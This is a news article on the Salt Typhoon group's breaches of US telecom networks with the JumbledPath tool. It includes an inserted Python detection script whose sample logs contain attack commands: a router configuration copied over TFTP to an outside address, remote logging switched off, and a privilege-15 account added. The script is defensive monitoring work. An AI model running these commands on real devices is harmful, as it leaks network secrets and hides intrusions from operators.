Chinese hackers from the state-sponsored group Salt Typhoon have been exposed for launching targeted cyberattacks against major US telecommunications networks.
Using a custom-built malware tool named JumbledPath, the group managed to infiltrate telecom providers and monitor network traffic, leading to the theft of sensitive data, including private communications of US government officials.
Salt Typhoon, also known as Earth Estries, GhostEmperor, and UNC2286, has been active since 2019, focusing on government entities and telecom companies. Recent investigations revealed that the group successfully breached several major US telecom providers, including Verizon, AT&T, Lumen Technologies, and T-Mobile. Alarming findings showed that Salt Typhoon accessed confidential government communications and even stole information related to court-authorised wiretapping requests.
Security researchers found that the hackers targeted over 1,000 Cisco network devices between December 2024 and January 2025, with more than half located in the US, South America, and India. Cisco Talos reported that Salt Typhoon used stolen credentials as its primary method of infiltration, with only one case involving exploitation of the Cisco CVE-2018-0171 vulnerability. No new vulnerabilities were identified during this campaign.
Once inside the networks, the Chinese hackers expanded their reach by extracting additional credentials and intercepting authentication traffic.
They exfiltrated device configurations containing sensitive data through unsecured transfer methods, enabling further lateral movement within the network. The group demonstrated advanced evasion tactics, such as frequently switching between devices to avoid detection and modifying network settings to maintain persistent access.
A key tool in their operation was the JumbledPath malware, a Go-based binary designed for Linux-based networking devices. This tool allowed the hackers to capture network traffic while masking their presence, disabling logging, and clearing evidence to complicate forensic investigation.
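The behaviours described above (configuration exfiltration over unsecured transfer methods, logging being disabled, and settings changed to keep access) all leave traces in a device's configuration-change log. The following is an added example, not code from the article or from Cisco Talos: it runs simple detection rules over constructed Cisco-style configuration-logging lines. The message layout, hostnames, addresses and the choice of a privileged local account as a persistence indicator are assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample lines modelled on Cisco IOS config logging
# (%PARSER-5-CFGLOG_LOGGEDCMD). Layout and values are assumed, not captured.
SAMPLE_LOGS = [
    "Feb 20 03:14:07 core-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:copy running-config tftp://203.0.113.9/core-rtr1.cfg",
    "Feb 20 03:14:21 core-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:no logging host 10.10.0.5",
    "Feb 20 03:15:02 core-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:username svc-backup privilege 15 secret REDACTED",
    "Feb 20 09:00:11 core-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:interface GigabitEthernet0/1",
    "Feb 20 09:00:12 core-rtr1 %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:description uplink to dist-sw2",
]

CFGLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) %PARSER-5-CFGLOG_LOGGEDCMD: "
    r"User:(?P<user>\S+) +logged command:(?P<cmd>.*)$"
)

# One rule per behaviour; each matches the logged command text.
RULES = {
    # configuration copied out over a plaintext transfer protocol
    "config_copied_unsecured": re.compile(r"^copy\s+\S*config\S*\s+(tftp|ftp):", re.I),
    # remote logging switched off before further activity
    "logging_disabled": re.compile(r"^no\s+logging\b", re.I),
    # privileged local account added (assumed persistence indicator)
    "privileged_account_added": re.compile(r"^username\s+\S+\s+privilege\s+15\b", re.I),
}

@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    command: str

def parse_cfglog(line: str) -> Optional[dict]:
    """Return the fields of a config-logging line, or None for other message types."""
    m = CFGLOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines: list) -> list:
    """Flag logged configuration commands that match any rule, in log order."""
    findings = []
    for line in lines:
        rec = parse_cfglog(line)
        if rec is None:
            continue
        for name, pattern in RULES.items():
            if pattern.search(rec["cmd"]):
                findings.append(Finding(rec["host"], rec["user"], name, rec["cmd"]))
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f.host} user={f.user} rule={f.rule}: {f.command}")
```

In practice these lines would come from a central syslog collector, since a device whose logging has just been disabled will not report the change itself.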
Cybersecurity experts warn that Chinese hackers are increasingly targeting edge networking devices from major vendors like Fortinet, Cisco, and SonicWall. Organisations are urged to patch systems promptly and monitor for unusual network activity to defend against such sophisticated threats.
